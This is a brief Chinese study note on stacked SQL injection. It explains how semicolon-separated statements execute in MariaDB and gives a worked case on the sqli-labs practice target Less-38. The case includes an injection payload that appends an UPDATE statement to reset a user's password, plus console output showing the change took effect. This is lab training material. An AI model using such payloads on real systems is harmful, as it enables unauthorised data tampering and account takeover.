学习笔记-渗透测试-SQL注入_011_堆叠注

1 攻击原理

SQL语句允许堆叠执行多条语句，多条语句使用分号隔开，堆叠注入攻击就是利用该特性

MariaDB [(none)]> select version();show databases;
+----------------+
| version()      |
+----------------+
| 5.5.68-MariaDB |
+----------------+
1 row in set (0.00 sec)

+--------------------+
| Database           |
+--------------------+
| information_schema |
| bWAPP              |
| challenges         |
| dvwa               |
| mysql              |
| performance_schema |
| security           |
| test               |
+--------------------+
8 rows in set (0.00 sec)

2 攻击案例

案例靶场 sqlilab Less-38

此类注入不会有数据回显点，所以建议进行用户操作

1';update users set password='123456' where username='Dumb';--+


MariaDB [security]> select * from users where username='Dumb';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)